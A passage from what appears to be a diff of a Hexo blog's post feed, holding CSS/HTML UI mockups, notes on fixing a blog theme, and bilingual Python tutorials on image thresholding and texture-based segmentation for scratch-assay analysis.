    color: #606060;
    }
    .decline {
    color:rgb(208, 0, 0);
    }
    </style>
    <p>
    <span class="current">1049.61 </span>
    <span class="usd">USD</span>
    </p>
    <p class="rise">+18.05 (1.75%) today</p>
    <p>
    <span class="after_hours">After hours 1,048.00 </span>
    <span class="decline">-1.61 (0.15%)</span>
    </p>

    png

    • 5g.
    <style>
    p {
    font-family: Arial;
    margin-top: 8px;
    margin-bottom: 8px;
    }
    .title {
    font-weight: bold;
    }
    .author {
    color:#888;
    }
    .at {
    color:rgb(31, 169, 255);
    }
    .text {
    margin-top: 18px;
    }
    </style>
    <p>
    <span class="title">freeCodeCamp.org</span>
    <span class="author">@freeCodeCamp 1h</span>
    </p>
    <p>As a web developer, you'll want to make your projects easy to use and navigate around.</p>
    <p class="text">
    Here
    <span class="at">@chp_it</span>
    outlines the top skills new developers should have.
    </p>

    png

    ]]>
    @@ -9086,7 +9086,7 @@ /posts/Diary-%E9%83%BD%E6%B6%A6%E5%9B%9E%E5%AE%B6%E6%89%8D%E6%83%B3%E7%9D%80%E5%86%99%E5%AF%84%E4%BA%86%E7%9A%84%E6%B2%B3%E6%91%86%E5%B8%A6%E5%AD%A6%E7%9A%84%E6%97%B6%E5%85%89%E7%9C%9F%E6%98%AF%E5%B1%91%E5%95%8A/ -
    ]]>
    +
    ]]>
@@ -9113,7 +9113,7 @@ /posts/Web-html+css%E6%A8%A1%E6%8B%9F%E5%BE%AE%E4%BF%A1QQ%E8%81%8A%E5%A4%A9%E6%A1%86/ - References

    ]]>
+ References

Code

    CSS

    .chat_box {
    display: grid;
    padding: 15px 10px;
    margin: 5px 0;
    transition: background-color 0.5s ease-in-out;
    }

    .left,
    .weixin,
    .qq {
    position: relative;
    max-width: min(400px, 75%);
    padding: 8px 10px;
    margin: 8px 0;
    border-radius: 5px;
    word-break: break-all;
    line-height: 24px;
    }

    .left {
    justify-self: left;
    left: 20px;
    }

    .weixin,
    .qq {
    justify-self: end;
    right: 20px;
    }

    .weixin {
    background-color: #9EEA6A;
    }

    .qq {
    background-color: #1E6EFF;
    color: #FFF;
    }

    .left::before,
    .weixin::before,
    .qq::before {
    content: '';
    position: absolute;
    top: 10px;
    width: 0;
    height: 0;
    border-style: solid;
    }

    .left::before {
    left: -8px;
    border-width: 8px 10px 8px 0;
    }

    .weixin::before {
    right: -9px;
    border-width: 8px 0 8px 10px;
    }

    .qq::before {
    right: -8px;
    border-width: 8px 0 8px 10px;
    }

    [data-theme='light'] {
    .chat_box {
    background-color: #f5f5f5;
    }

    .left {
    background-color: #FFF;
    }

    .left::before {
    border-color: transparent #fff transparent transparent;
    }

    .weixin::before {
    border-color: transparent transparent transparent #9EEA6A;
    }

    .qq::before {
    border-color: transparent transparent transparent #1E6EFF;
    }
    }

    [data-theme='dark'] {
    .chat_box {
    background-color: #111111;
    }

    .left,
    .weixin,
    .qq {
    color: #d5d5d5;
    }

    .left {
    background-color: #2c2c2c;
    }

    .weixin {
    background-color: #3eb477;
    color: #111111;
    }

    .qq {
    background-color: #2c2c2c;
    }

    .left::before {
    border-color: transparent #2c2c2c transparent transparent;
    }

    .weixin::before {
    border-color: transparent transparent transparent #3eb477;
    }

    .qq::before {
    border-color: transparent transparent transparent #2c2c2c;
    }
    }
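
Two notes on the CSS above: the rules nested inside [data-theme='…'] rely on CSS nesting (or a preprocessor such as Less), and the bubble tails use the classic zero-size border-triangle trick. A minimal standalone sketch of the triangle (the class name is illustrative):

/* a 0x0 element shows only its borders; making all but one side
   transparent leaves a single triangle (here pointing left) */
.tail {
  width: 0;
  height: 0;
  border-style: solid;
  border-width: 8px 10px 8px 0;  /* top right bottom left */
  border-color: transparent #fff transparent transparent;
}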

    HTML

    <div class="chat_box">
    <div class="left">我会夺取你的灵魂!</div>
    <div class="weixin">哇哦~</div>
    <div class="qq">圣光会制裁你!</div>
    </div>

Test

Gul'dan VS Anduin!

    我会夺取你的灵魂!
    哇哦~
    圣光会制裁你!

You win this time…

    ]]>
    @@ -9138,7 +9138,7 @@ /posts/Diary-%E9%97%BD%E4%BA%86/ -
    ]]>
    +
    ]]>
@@ -9167,7 +9167,7 @@ /posts/Hexo-%E6%9B%B4%E6%96%B0%E4%BA%86hexo%E4%B8%BB%E9%A2%98/ - Preface
    ]]>
+ Preface

The theme "hexo-theme-quiet: 🔥A simple, easy to read flat hexo theme" has been updated! My blog now has some new improvements. Many thanks to the theme's author!

At the same time, I think the theme still has a few issues; I'll record them here and try to fix them myself.

    gif

Body

Post comments

png

This feature requires you to create your own OAuth application…

Because most post titles are too long, the comment board throws Error: Validation Failed. I meant to fix it when I had time, orz, but the article below solves it by hashing the title with MD5. Clever!

CSS tweaks and UI updates

png

This table looks much cleaner now!

png

I never liked the original theme's black code boxes on a white background, so I fiddled with the CSS and changed them to something close to the Jupyter Notebook style.

png

This code didn't wrap lines, orz. Replacing the entire contents of hljs.min.js with the contents of the old jquery.min.js made it feel much better.

Improving image display

png

Images can now be scrolled through one at a time.

png

When photos are displayed, 100% width feels a bit too wide. Time to change the code! Modify the img rule in source\css\public\article_cente.less:

    img {
    max-width: 80%;
    cursor: pointer;
    margin: 8px auto;
    text-align: center;
    display: flex;
    border-radius: 10px;
    outline: none;
    border: 0;
    }

Thanks to my classmate Paul for this one 😘~

Tag links fail to navigate

png

Right now, clicking a tag on a post fails to navigate. After some digging, the culprit is line 34 of layout\_partial\post_head.ejs:

    <% page.categories.data.map((cat)=>{ %>
    <a href="../../<%- cat.path %>" target="_blank" ><%- cat.name %></a>
    <% }) %>

The cat.path link is wrong; change it to

    <a href="/categories/<%- cat.name %>" target="_blank" ><%- cat.name %></a>

So clever of me!

Covers disappear when paginating

png

Not sure whether it's my configuration or something the original author never noticed, orz, but paginating breaks every cover URL so none of them display.

~~I have a fix that feels pretty dumb:~~ change lines 8-12 of layout\_partial\home.ejs:

    <% if(post.cover){ %>
    <img src="<%= post.cover %>" alt="Quiet">
    <% }else{ %>
    <img src="<%- theme.default_cover %>" alt="Quiet">
    <% } %>

to:

    <% if(post.cover){ %>
    <img src="<%= theme.menus.home + post.cover %>" alt="Cover">
    <% }else{ %>
    <img src="<%- theme.default_cover %>" alt="Cover">
    <% } %>

The chunk around line 40 needs the same change. The downside is that loading covers on localhost now also tries to fetch them from GitHub, which wastes bandwidth, orz.

Build errors

png

No idea what causes the errors when running hexo g, orz.

It doesn't seem to affect anything, though? It's just annoying to look at, orz.

My web-dev skills are too weak to fix this anytime soon, orz.

Since I can't fix it, let's just delete it!

Playing music

MoePlayer/hexo-tag-aplayer: embed a player in Hexo posts/pages (github.com)

Hexo MathJax fails to render

mathjax.js gets blocked:

png

hexo mathjax 无法渲染 - 简书 (jianshu.com): pick the https… version of the script

Only 9 tags are shown

Rewrote tags.ejs following the pattern of archive.ejs…

    <% page.title = __("标签:" + page.tag) %>
    <%- partial('_partial/header',{name:'tags'}) %>
    <%
    var years = {};
    site.posts.sort('date').reverse().forEach(function(post){
    const tags = post.tags;
    if(tags.length < 1) return
    tags.data.map((t)=>{
    if(page.tag === t.name){
    var year = post.date.year()
    if(years[year]===undefined){
    years[year] = [];
    }
    years[year].push(post);
    }
    })
    });
    %>

    <div class="tag">
    <%- partial('_widget/header_body',{message:"文章标签:"+page.tag,icon:theme.headers.tags.icon}) %>
    <div class="tag-content" id="content">
    <div class="tag-content-data">
    <%- partial('_widget/grouping',{data:years,keys:Object.keys(years).reverse()}) %>
    </div>
    </div>
    </div>
    ]]>
@@ -9192,7 +9192,7 @@ /posts/DIP-Introductory%20python%20tutorials%20for%20image%20processing(51-58)-Image%20Segmentation/ - Body

    Tutorial 51 - What is image thresholding and segmentation

What is image segmentation?

And how is it different from thresholding?

    Image segmentation is the process of partitioning a digital image into multiple segments(image objects).


    Image thresholding is a simple form of image segmentation, it is a way to create a binary image based on setting a threshold value on the pixel intensity of the original image.


    png

OpenCV — threshold segmentation (histogram method, entropy method, Otsu, adaptive thresholding)

    import cv2
    import matplotlib.pyplot as plt

    img = cv2.imread("images/Osteosarcoma_01.tif", 1)
    plt.imshow(img[:,:,::-1])
    <matplotlib.image.AxesImage at 0x15586e075e0>

    png

• Separate out the blue channel, as it contains the nuclei pixels (DAPI).
    blue_channel = img[:,:,0]
    plt.imshow(blue_channel, cmap="gray")
    <matplotlib.image.AxesImage at 0x20c6bc29a60>

    png

    plt.hist(blue_channel.flat, bins=100, range=(0, 120))
(array of 100 histogram counts, array of 101 bin edges from 0.0 to 120.0, <BarContainer object of 100 artists>)

    png

• Manual thresholding by applying a threshold value to the numpy array
      • 手动设置阈值
    • After thresholding we will get a binary image.
      • 阈值化后得到二值图像。
    background = (blue_channel <= 40)
    nuclei = (blue_channel > 40)
    plt.imshow(nuclei, cmap="gray")
    <matplotlib.image.AxesImage at 0x20c6bb277f0>

    png

    • Using opencv to perform manual threshold
      • 使用 opencv 执行手动阈值
    • All pixels above 40 will have pixel value 255
      • 所有高于 40 的像素的像素值都是 255
• Should be exactly the same as the above method.
      • 应该与上面的方法完全相同。
    ret1, thresh1 = cv2.threshold(blue_channel, 40, 255, cv2.THRESH_BINARY)
    ret1, thresh1
    (40.0, array([[255, 255, 255, ...,   0,   0,   0],        [255, 255, 255, ...,   0,   0,   0],        [255, 255, 255, ...,   0,   0,   0],        ...,        [  0,   0,   0, ...,   0,   0,   0],        [  0,   0,   0, ...,   0,   0,   0],        [  0,   0,   0, ...,   0,   0,   0]], dtype=uint8))
    plt.imshow(thresh1, cmap="gray")
    <matplotlib.image.AxesImage at 0x20c00133220>

    png

    AUTO using OTSU

    • Using opencv for otsu based automatic thresholding
      • 使用 opencv 进行基于 otsu 的自动阈值分割
• Reports a value of 50 as the threshold for the nuclei.
      • 报告值 50 作为细胞核的阈值。
    ret2, thresh2 = cv2.threshold(blue_channel, 0, 255, cv2.THRESH_BINARY +  cv2.THRESH_OTSU)
    ret2, thresh2
    (50.0, array([[255, 255,   0, ...,   0,   0,   0],        [255, 255, 255, ...,   0,   0,   0],        [255, 255, 255, ...,   0,   0,   0],        ...,        [  0,   0,   0, ...,   0,   0,   0],        [  0,   0,   0, ...,   0,   0,   0],        [  0,   0,   0, ...,   0,   0,   0]], dtype=uint8))
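The reference above also lists adaptive thresholding, which this tutorial does not demonstrate. As a minimal sketch (reusing blue_channel from above; the blockSize of 11 and constant C of 2 are illustrative assumptions, not from the tutorial), cv2.adaptiveThreshold computes a per-pixel threshold from each pixel's local neighbourhood, which can help when illumination is uneven:

# Adaptive thresholding (sketch): each pixel's threshold is the mean of its
# blockSize x blockSize neighbourhood minus the constant C, so uneven
# illumination is handled better than with a single global threshold.
adaptive = cv2.adaptiveThreshold(blue_channel, 255,
                                 cv2.ADAPTIVE_THRESH_MEAN_C,
                                 cv2.THRESH_BINARY, 11, 2)
plt.imshow(adaptive, cmap="gray")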

    numpy.digitize

• np.digitize needs bins to be defined as an array
  • np.digitize 需要将 bins 定义为数组
• So let us convert the threshold value to an array
  • 让我们将阈值转换为一个数组
• np.digitize assigns values 0, 1, 2, 3, … to pixels in each class.
  • np.digitize 将值 0,1,2,3,… 赋给每个类中的像素。
• For binary it would be 0 and 1.
  • 对于二值图像,它是 0 和 1。
    import numpy as np

    regions1 = np.digitize(blue_channel, bins=np.array([ret2]))
    plt.imshow(regions1)
    <matplotlib.image.AxesImage at 0x20c00a05ca0>

    png

Tutorial 52 - Auto-thresholding for multiple regions using multi-Otsu

    from matplotlib import pyplot as plt
    import numpy as np
    from skimage.filters import threshold_multiotsu
    import cv2
    img = cv2.imread("images/BSE.tif", 0)
    plt.imshow(img, cmap="gray")
    <matplotlib.image.AxesImage at 0x163340e4e20>

    png

    # .flat returns the flattened numpy array (1D)
    plt.hist(img.flat, bins=100, range=(100, 255))
    (array([ 1503.,  4537.,  3200.,  4608.,  5865.,  7691.,  9625., 25963.,            0., 33377., 18666., 19131., 36722.,     0., 31707., 13031.,        10769.,  8827.,  6923.,  5264.,  7160.,  2595.,  1889.,  1722.,         1539.,  3244.,     0.,  4418.,  3113.,  4053., 11409.,     0.,        16772., 10292., 10680., 11360., 11665., 11160., 19404.,     0.,        14149.,  5101.,  3961.,  4908.,     0.,  2600.,   669.,   518.,          354.,   477.,   172.,   160.,   114.,   126.,   255.,     0.,          267.,   142.,   134.,    87.,   123.,   204.,    84.,   122.,           98.,   104.,   107.,   206.,     0.,   207.,   108.,   116.,          256.,     0.,   244.,   137.,   140.,   138.,   166.,   170.,          383.,   237.,   316.,   343.,   477.,  1422.,     0.,  2259.,         1469.,  1623.,  3926.,     0.,  4171.,  1900.,  1763.,  1432.,         1093.,   809.,  1017.,   603.]), array([100.  , 101.55, 103.1 , 104.65, 106.2 , 107.75, 109.3 , 110.85,        112.4 , 113.95, 115.5 , 117.05, 118.6 , 120.15, 121.7 , 123.25,        124.8 , 126.35, 127.9 , 129.45, 131.  , 132.55, 134.1 , 135.65,        137.2 , 138.75, 140.3 , 141.85, 143.4 , 144.95, 146.5 , 148.05,        149.6 , 151.15, 152.7 , 154.25, 155.8 , 157.35, 158.9 , 160.45,        162.  , 163.55, 165.1 , 166.65, 168.2 , 169.75, 171.3 , 172.85,        174.4 , 175.95, 177.5 , 179.05, 180.6 , 182.15, 183.7 , 185.25,        186.8 , 188.35, 189.9 , 191.45, 193.  , 194.55, 196.1 , 197.65,        199.2 , 200.75, 202.3 , 203.85, 205.4 , 206.95, 208.5 , 210.05,        211.6 , 213.15, 214.7 , 216.25, 217.8 , 219.35, 220.9 , 222.45,        224.  , 225.55, 227.1 , 228.65, 230.2 , 231.75, 233.3 , 234.85,        236.4 , 237.95, 239.5 , 241.05, 242.6 , 244.15, 245.7 , 247.25,        248.8 , 250.35, 251.9 , 253.45, 255.  ]), <BarContainer object of 100 artists>)

    png

    MANUAL 手工阈值分割

• We can perform manual segmentation, but the automatic method works fine.
  • 可以手动分割,但自动方法效果也不错。
    region1 = (img >= 0) & (img <75)
    region2 = (img >= 75) & (img <140)
    region3 = (img >= 140) & (img <200)
    region4 = (img >= 200) & (img <=255)
    # Create 3 channel blank image of same size as original
    # 创建 3 通道空白图像,大小与原始图像相同
    all_regions = np.zeros((img.shape[0], img.shape[1], 3))
    all_regions[region1] = (1,0,0) # 红
    all_regions[region2] = (0,1,0) # 绿
    all_regions[region3] = (0,0,1) # 蓝
    all_regions[region4] = (1,1,0) # 黄
    all_regions
    array([[[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]],       [[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]],       [[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]],       ...,       [[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]],       [[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]],       [[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]]])
    plt.imshow(all_regions)
    <matplotlib.image.AxesImage at 0x16334046340>

    png

    AUTO 自动

    # Apply multi-Otsu threshold 
    thresholds = threshold_multiotsu(img, classes=4)
• Digitize (segment) original image into multiple classes.
  • 将原始图像数字化(分割)成多个类。
• np.digitize assigns values 0, 1, 2, 3, … to pixels in each class.
  • np.digitize 将值 0,1,2,3,… 赋给每个类中的像素。

    regions = np.digitize(img, bins=thresholds)
    plt.imshow(regions)
    <matplotlib.image.AxesImage at 0x163340a6a30>

    png

    segm1 = (regions == 0)
    segm2 = (regions == 1)
    segm3 = (regions == 2)
    segm4 = (regions == 3)

    OpenCV 图像处理之膨胀与腐蚀

• We can use binary opening and closing operations to clean up.
  • 我们可以使用二值开运算和闭运算来清理。
• Opening takes care of isolated pixels within the window.
  • 开运算负责处理窗口内的孤立像素。
• Closing takes care of isolated holes within the defined window.
  • 闭运算处理已定义窗口内的孤立孔洞。

    png

    from scipy import ndimage as nd

    segm1_opened = nd.binary_opening(segm1, np.ones((3,3)))
    segm1_closed = nd.binary_closing(segm1_opened, np.ones((3,3)))

    segm2_opened = nd.binary_opening(segm2, np.ones((3,3)))
    segm2_closed = nd.binary_closing(segm2_opened, np.ones((3,3)))

    segm3_opened = nd.binary_opening(segm3, np.ones((3,3)))
    segm3_closed = nd.binary_closing(segm3_opened, np.ones((3,3)))

    segm4_opened = nd.binary_opening(segm4, np.ones((3,3)))
    segm4_closed = nd.binary_closing(segm4_opened, np.ones((3,3)))

    all_segments_cleaned = np.zeros((img.shape[0], img.shape[1], 3))

    all_segments_cleaned[segm1_closed] = (1,0,0)
    all_segments_cleaned[segm2_closed] = (0,1,0)
    all_segments_cleaned[segm3_closed] = (0,0,1)
    all_segments_cleaned[segm4_closed] = (1,1,0)

    plt.imshow(all_segments_cleaned) # All the noise should be cleaned now
    <matplotlib.image.AxesImage at 0x1633505ba00>

    png

    Tutorial 53 - Using texture to segment images -demo in python

• Variance - expectation of the squared deviation of a random variable from its mean. Could be a good indicator of texture.

  • 方差——随机变量与其均值的平方偏差的期望。可能是纹理的良好指标。
• Entropy - quantifies disorder - a very good metric to quantify texture

  • 熵——量化无序程度——一个非常好的纹理度量

Gabor convolutional kernel - Gabor 卷积核

$$g(x,y,\lambda,\theta,\psi,\sigma,\gamma)=\exp\left(-\frac{x'^2+\gamma^2y'^2}{2\sigma^2}\right)\cos\left(2\pi\frac{x'}{\lambda}+\psi\right)$$

    其中:

$x'=x\cos(\theta)+y\sin(\theta)$

$y'=-x\sin(\theta)+y\cos(\theta)$
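To connect the formula to code, here is a minimal numpy sketch that evaluates $g(x,y)$ directly on a square grid (the function gabor_kernel and its grid construction are our own illustration, not part of the tutorial):

import numpy as np

def gabor_kernel(ksize, lam, theta, psi, sigma, gamma):
    # Evaluate g(x, y) on a ksize x ksize grid centered at the origin.
    half = ksize // 2
    y, x = np.mgrid[-half:half + 1, -half:half + 1]
    x_p = x * np.cos(theta) + y * np.sin(theta)    # x'
    y_p = -x * np.sin(theta) + y * np.cos(theta)   # y'
    envelope = np.exp(-(x_p ** 2 + gamma ** 2 * y_p ** 2) / (2 * sigma ** 2))  # Gaussian envelope
    carrier = np.cos(2 * np.pi * x_p / lam + psi)  # sinusoidal carrier
    return envelope * carrier

cv2.getGaborKernel, used below, builds the same kind of kernel from these parameters.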

    import matplotlib.pyplot as plt
    from skimage import io
    import numpy as np
    from skimage.filters import threshold_otsu
    import cv2
    img = io.imread("images/Scratch0.jpg", as_gray=True)
    plt.imshow(img, cmap="gray")
    <matplotlib.image.AxesImage at 0x22ee31fc790>

    png

    • Variance - not a great way to quantify texture

      • 方差 -不是一个量化纹理的好方法
    from scipy import ndimage 

    k = 7
    img_mean = ndimage.uniform_filter(img, (k, k))
    img_sqr_mean = ndimage.uniform_filter(img ** 2, (k, k))
    img_var = img_sqr_mean - img_mean ** 2
    plt.imshow(img_var, cmap='gray')
    <matplotlib.image.AxesImage at 0x22ee37a4d90>

    png

    论文阅读:Gabor Convolutional Networks_OopsZero 的博客-CSDN 博客_gabor 卷积

• GABOR - A great filter for texture, but usually only efficient if we know the exact parameters.

  • GABOR——一个很好的纹理滤波器,但通常只有在知道精确参数时才有效。
• Good choice for generating features for machine learning.

  • 为机器学习生成特征的好选择。
    ksize = 45
    theta = np.pi / 4
    kernel = cv2.getGaborKernel((ksize, ksize), 5.0, theta, 10.0, 0.9, 0, ktype=cv2.CV_32F)
    filtered_image = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(filtered_image, cmap='gray')
    <matplotlib.image.AxesImage at 0x22ee37d7430>

    png

• Entropy: Entropy quantifies disorder.

  • 熵:熵量化无序。
• Since the cell region has high variation in pixel values, the entropy will be higher compared to the scratch region.

  • 由于细胞区域的像素值变化较大,熵值将高于划痕区域。
    from skimage.filters.rank import entropy
    from skimage.morphology import disk

    entropy_img = entropy(img, disk(3))
    plt.imshow(entropy_img)
    <matplotlib.image.AxesImage at 0x22ee39d3d60>

    png

    • Scratch Analysis - single image

      • 划痕分析 -单幅图像
    • Now let us use otsu to threshold high vs low entropy regions.

      • 现在让我们用 otsu 来阈值高熵区和低熵区。
    plt.hist(entropy_img.flat, bins=100, range=(0,5))  #.flat returns the flattened numpy array (1D)
    (array([2.4906e+04, 0.0000e+00, 0.0000e+00, 0.0000e+00, 1.2640e+03,        4.0000e+00, 1.1000e+01, 3.4300e+02, 5.5700e+02, 1.0300e+02,        5.0000e+00, 6.8000e+02, 1.1500e+02, 3.4200e+02, 3.2900e+02,        3.1000e+02, 4.3700e+02, 1.9700e+02, 5.8100e+02, 1.6200e+02,        7.0100e+02, 1.4600e+02, 7.9900e+02, 2.1600e+02, 8.2000e+02,        4.6400e+02, 8.6300e+02, 6.2200e+02, 6.5100e+02, 7.2900e+02,        9.3500e+02, 1.0210e+03, 1.0650e+03, 1.1500e+03, 1.3230e+03,        1.5200e+03, 1.7200e+03, 1.9000e+03, 1.9490e+03, 2.6150e+03,        2.2130e+03, 3.0250e+03, 2.5620e+03, 3.1800e+03, 3.1780e+03,        3.2440e+03, 3.6230e+03, 3.3250e+03, 3.3660e+03, 3.5170e+03,        3.1100e+03, 3.3400e+03, 2.7800e+03, 2.6460e+03, 2.6750e+03,        2.0790e+03, 2.3660e+03, 1.8520e+03, 1.6350e+03, 1.5170e+03,        1.2040e+03, 1.1810e+03, 9.1000e+02, 8.3300e+02, 7.9300e+02,        6.5600e+02, 5.7100e+02, 4.1800e+02, 4.1400e+02, 3.6200e+02,        2.7300e+02, 2.2500e+02, 2.0900e+02, 1.8400e+02, 1.5600e+02,        1.0200e+02, 7.1000e+01, 5.7000e+01, 6.6000e+01, 3.2000e+01,        3.2000e+01, 2.0000e+01, 1.7000e+01, 5.0000e+00, 1.2000e+01,        2.0000e+00, 5.0000e+00, 2.0000e+00, 0.0000e+00, 0.0000e+00,        0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00,        0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00]), array([0.  , 0.05, 0.1 , 0.15, 0.2 , 0.25, 0.3 , 0.35, 0.4 , 0.45, 0.5 ,        0.55, 0.6 , 0.65, 0.7 , 0.75, 0.8 , 0.85, 0.9 , 0.95, 1.  , 1.05,        1.1 , 1.15, 1.2 , 1.25, 1.3 , 1.35, 1.4 , 1.45, 1.5 , 1.55, 1.6 ,        1.65, 1.7 , 1.75, 1.8 , 1.85, 1.9 , 1.95, 2.  , 2.05, 2.1 , 2.15,        2.2 , 2.25, 2.3 , 2.35, 2.4 , 2.45, 2.5 , 2.55, 2.6 , 2.65, 2.7 ,        2.75, 2.8 , 2.85, 2.9 , 2.95, 3.  , 3.05, 3.1 , 3.15, 3.2 , 3.25,        3.3 , 3.35, 3.4 , 3.45, 3.5 , 3.55, 3.6 , 3.65, 3.7 , 3.75, 3.8 ,        3.85, 3.9 , 3.95, 4.  , 4.05, 4.1 , 4.15, 4.2 , 4.25, 4.3 , 4.35,        4.4 , 4.45, 4.5 , 4.55, 4.6 , 4.65, 4.7 , 4.75, 4.8 , 4.85, 4.9 ,        4.95, 5.  ]), <BarContainer object of 100 artists>)

    png

    • Now let us binarize the entropy image
      • 现在我们把熵图像二值化
    thresh = threshold_otsu(entropy_img)
    thresh
    1.2953342370696572
    binary = entropy_img <= thresh
    plt.imshow(binary)
    <matplotlib.image.AxesImage at 0x22ee3ab2280>

    png

# Sum all pixels in the scratch region (values = 1)
scratch_area = np.sum(binary == 1)
print("Scratched area is: ", scratch_area, "Square pixels")

scale = 0.45 # microns / pixel
print("Scratched area in sq. microns is: ", scratch_area*((scale)**2), "Square microns")
Scratched area is:  33485 Square pixels
Scratched area in sq. microns is:  6780.712500000001 Square microns

    Tutorial 54 - Scratch assay analysis in python by using texture for segmentation

    What is scratch assay (wound healing) analysis? 什么是划痕分析(伤口愈合)?

    • The wound healing assay is a standard technique for probing collective cell migration in two dimensions.

      • 伤口愈合试验是一种标准的技术,用于探测细胞在二维上的集体迁移。
• A monolayer of cells is scratched with a pipette tip.

  • 用移液管尖端划破单层细胞。
• The migration of cells into the gap is imaged over several hours using a microscope.

  • 用显微镜在几个小时内拍摄细胞迁移进入缝隙的过程。
    • The primary information derived is the rate of gap closure → a measure of the speed of the collective motion of the cells.

      • 得到的主要信息是间隙闭合率→细胞集体运动速度的度量。

    png


    • Scratch Assay on time series images
      • 时间序列图像划痕分析
    import matplotlib.pyplot as plt
    from skimage import io
    from skimage.filters.rank import entropy
    from skimage.morphology import disk
    import numpy as np
    from skimage.filters import threshold_otsu
    • Use glob to extract image names and load them.
      • 使用glob提取图像名称并加载它们。
    import glob
    time = 0
    scale = 0.45 # microns/pixel
    time_list = []
    area_list = []
    path = "images/scratch_assay/*.*"
• Put the code from single image segmentation in a for loop to apply segmentation to all images
  • 将来自单个图像分割的代码放入 for 循环中,将分割应用于所有图像
for file in glob.glob(path):
    img = io.imread(file)
    entropy_img = entropy(img, disk(3))
    thresh = threshold_otsu(entropy_img)
    binary = entropy_img <= thresh
    scratch_area = np.sum(binary == 1)
    scratch_area = scratch_area * ((scale) ** 2) # Convert to microns from pixel units
    print("time=", time, "hr ", "Scratch area=", scratch_area, "um\N{SUPERSCRIPT TWO}")
    time_list.append(time)
    area_list.append(scratch_area)
    time += 1
time= 0 hr   Scratch area= 6768.765 um²
time= 1 hr   Scratch area= 5605.807500000001 um²
time= 2 hr   Scratch area= 4881.465 um²
time= 3 hr   Scratch area= 4277.4075 um²
time= 4 hr   Scratch area= 3742.4025 um²
time= 5 hr   Scratch area= 3261.2625000000003 um²
time= 6 hr   Scratch area= 2919.4425 um²
time= 7 hr   Scratch area= 2575.1925 um²
time= 8 hr   Scratch area= 2218.7925 um²
time= 9 hr   Scratch area= 1890.7425 um²
    plt.plot(time_list, area_list, 'bo')  # Print blue dots scatter plot
    [<matplotlib.lines.Line2D at 0x295b35d21c0>]

    png

    • Print slope, intercept

      • 打印斜率、截距
    from scipy.stats import linregress  # Linear regression

    slope, intercept, r_value, p_value, std_err = linregress(time_list, area_list)
    print("y = ",slope, "x", " + ", intercept)
    print("R\N{SUPERSCRIPT TWO} = ", r_value ** 2)
y =  -507.25881818181824 x  +  6096.792681818182
R² =  0.9568904267126052
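To visualize how well the line fits, we could overlay it on the scatter plot - a small sketch reusing time_list, area_list, slope, and intercept from above:

t = np.array(time_list)
plt.plot(time_list, area_list, 'bo')      # measured scratch areas
plt.plot(t, slope * t + intercept, 'r-')  # fitted line from linregress
plt.xlabel("Time (hr)")
plt.ylabel("Scratch area (um\N{SUPERSCRIPT TWO})")
plt.show()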

    Tutorial 55 - Image segmentation followed by measurements- in python

    from skimage import measure, io, img_as_ubyte
    import matplotlib.pyplot as plt
    from skimage.color import label2rgb, rgb2gray
    import numpy as np
    import cv2
    image = img_as_ubyte(rgb2gray(io.imread('images/cast_iron1.tif')))
    scale = 0.6
    plt.imshow(image, cmap='gray')
    <matplotlib.image.AxesImage at 0x200892d89a0>

    png

    plt.hist(image.flat, bins=100, range=(0, 255))
    (array([    0.,    46.,   479.,  1449.,   966.,  1498.,  1081.,  1901.,         1408.,  2200.,  2605.,  1816.,  2434.,  1382.,  1474.,   686.,          719.,   387.,   439.,   275.,   322.,   311.,   195.,   347.,          197.,   305.,   191.,   297.,   193.,   303.,   315.,   169.,          300.,   173.,   331.,   239.,   344.,   234.,   409.,   271.,          467.,   435.,   337.,   569.,   420.,   744.,   545.,   906.,          747.,  1251.,  1509.,  1195.,  2163.,  1900.,  3508.,  3022.,         5913.,  5444., 11870., 11205., 25793., 40120., 29310., 32387.,         8740.,  1102.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.]), array([  0.  ,   2.55,   5.1 ,   7.65,  10.2 ,  12.75,  15.3 ,  17.85,         20.4 ,  22.95,  25.5 ,  28.05,  30.6 ,  33.15,  35.7 ,  38.25,         40.8 ,  43.35,  45.9 ,  48.45,  51.  ,  53.55,  56.1 ,  58.65,         61.2 ,  63.75,  66.3 ,  68.85,  71.4 ,  73.95,  76.5 ,  79.05,         81.6 ,  84.15,  86.7 ,  89.25,  91.8 ,  94.35,  96.9 ,  99.45,        102.  , 104.55, 107.1 , 109.65, 112.2 , 114.75, 117.3 , 119.85,        122.4 , 124.95, 127.5 , 130.05, 132.6 , 135.15, 137.7 , 140.25,        142.8 , 145.35, 147.9 , 150.45, 153.  , 155.55, 158.1 , 160.65,        163.2 , 165.75, 168.3 , 170.85, 173.4 , 175.95, 178.5 , 181.05,        183.6 , 186.15, 188.7 , 191.25, 193.8 , 196.35, 198.9 , 201.45,        204.  , 206.55, 209.1 , 211.65, 214.2 , 216.75, 219.3 , 221.85,        224.4 , 226.95, 229.5 , 232.05, 234.6 , 237.15, 239.7 , 242.25,        244.8 , 247.35, 249.9 , 252.45, 255.  ]), <BarContainer object of 100 artists>)

    png

    from skimage.filters import threshold_otsu
    threshold = threshold_otsu(image)
    threshold
    93
    # Generate thresholded image
    thresholded_img = image < threshold
    plt.imshow(thresholded_img, cmap='gray')
    <matplotlib.image.AxesImage at 0x20089b28760>

    png

    # Remove edge touching regions
    from skimage.segmentation import clear_border

    edge_touching_removed = clear_border(thresholded_img)
    plt.imshow(edge_touching_removed, cmap='gray')
    <matplotlib.image.AxesImage at 0x20089c39ca0>

    png

